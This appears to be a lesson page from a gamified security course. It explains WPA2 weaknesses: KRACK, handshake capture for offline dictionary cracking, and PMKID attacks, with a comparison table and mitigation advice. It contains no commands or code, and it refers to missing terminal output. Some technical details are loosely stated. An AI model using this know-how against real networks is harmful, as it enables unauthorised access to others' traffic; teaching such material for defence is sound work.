For over a decade, WPA2-PSK was the gold standard for wireless security. However, the discovery of the Key Reinstallation Attack (KRACK) revealed a fundamental flaw in how the 4-way handshake manages nonces, allowing attackers to decrypt traffic without ever knowing the password.
Traditional WPA2 cracking relies on capturing the 4-way handshake (EAPOL frames). Once the handshake is captured, an attacker can perform an offline dictionary attack against the Pairwise Master Key (PMK), which is derived from the SSID and the password.
PMKID cracking is a significant evolution; it allows attackers to capture the PMKID from a single EAPOL frame without needing a client to be actively connecting to the AP.
The terminal output above shows the capture of a handshake. The attacker now has the hashed password and the salt (SSID), which can be moved to a high-performance GPU cluster for cracking.
KRACK does not recover the password, but it breaks the encryption of the session, allowing for packet injection and decryption of sensitive data.
| Attack Vector | Target | Impact | Requirement |
|---|---|---|---|
| Dictionary Attack | PSK | Full Password Recovery | Captured Handshake |
| KRACK | Handshake State | Decryption/Injection | Active MitM |
| PMKID Attack | AP Beacon/Auth | Password Recovery | Single Packet |
To mitigate WPA2 flaws, administrators must ensure that all clients are patched against KRACK and use highly complex passwords (16+ characters) to render dictionary attacks computationally infeasible.
WPS is the 'backdoor' for most WPA2 attacks. Always disable WPS in the router administration panel.
Verify exercises to earn โ 180 XP and unlock next lab level.